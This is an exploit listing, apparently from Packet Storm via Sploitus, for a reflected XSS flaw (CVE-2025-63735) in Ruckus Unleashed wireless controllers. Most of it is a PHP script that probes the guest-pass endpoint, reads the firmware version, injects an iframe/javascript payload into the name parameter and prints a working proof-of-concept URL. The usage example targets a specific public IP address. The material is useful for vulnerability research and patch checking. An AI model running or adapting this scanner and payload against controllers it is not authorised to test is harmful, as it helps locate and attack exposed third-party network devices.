Exploit for 📄 Ruckus Unleashed 200.13.6.1.319 XSS Scanner CVE-2025-63735

## https://sploitus.com/exploit?id=PACKETSTORM:215813
=============================================================================================================================================
    | # Title     : Ruckus Unleashed 200.13.6.1.319 External Scanner                                                                            |
    | # Author    : indoushka                                                                                                                   |
    | # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 145.0.1 (64 bits)                                                            |
    | # Vendor    : https://www.ruckusnetworks.com/                                                                                             |
    =============================================================================================================================================
    
    [+] Summary 
    
    This release introduces a remote security scanner capable of detecting vulnerable Ruckus Unleashed systems over LAN or WAN using external IP addresses.
    
    [+] The scanner performs:
    
    Version Enumeration
    
    Endpoint Exposure Check
    
    Reflected XSS Detection for CVE‑2025‑63735
    
    Captive Portal Validation
    
    Full Signature‑Based Audit
    
    The tool was built to identify Ruckus controllers exposed to the internet and automatically verify whether the system reflects unsanitized input in the name parameter.
    
    [+] poc
    usage : php poc.php --target 41.110.27.120
    
    
    <?php
    
    
    function http_get($url) {
        $ch = curl_init();
        curl_setopt_array($ch, [
            CURLOPT_URL => $url,
            CURLOPT_RETURNTRANSFER => true,
            CURLOPT_FOLLOWLOCATION => true,
            CURLOPT_SSL_VERIFYPEER => false,
            CURLOPT_SSL_VERIFYHOST => false,
            CURLOPT_TIMEOUT => 10
        ]);
        $result = curl_exec($ch);
        curl_close($ch);
        return $result;
    }
    
    $target = $argv[1] ?? null;
    if(!$target){
        die("Usage: php scanner.php <target>\n");
    }
    
    echo "[+] Target: $target\n";
    
    $base = "https://$target/selfguestpass/guestAccessSubmit.jsp";
    $test  = "$base?cookie=null&tip=5&name=test123";
    
    echo "[+] Checking endpoint...\n";
    $resp = http_get($test);
    
    if(!$resp){
        die("[!] No response from target.\n");
    }
    
    echo "[+] Endpoint accessible.\n";
    
    echo "[+] Extracting version...\n";
    preg_match('/([0-9]{3}\.[0-9]+\.[0-9]+\.[0-9]+)/', $resp, $m);
    $version = $m[1] ?? "Unknown";
    
    echo "[+] Firmware: $version\n";
    
    if($version === "200.13.6.1.319"){
        echo "[!] Version is vulnerable.\n";
    }
    
    echo "[+] Sending XSS payload...\n";
    
    $payload = urlencode('</p><form><iframe src=javascript:alert(`xss`)>');
    $url     = "$base?cookie=null&tip=5&name=$payload";
    
    $resp2 = http_get($url);
    
    if(strpos($resp2, '</p><form><iframe') !== false){
        echo "[!] REFLECTED XSS CONFIRMED (CVE-2025-63735)\n";
        echo "[+] PoC URL:\n$url\n";
    } else {
        echo "[+] Not vulnerable.\n";
    }
    ?>
    
    
    Greetings to :=====================================================================================
    jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
    ===================================================================================================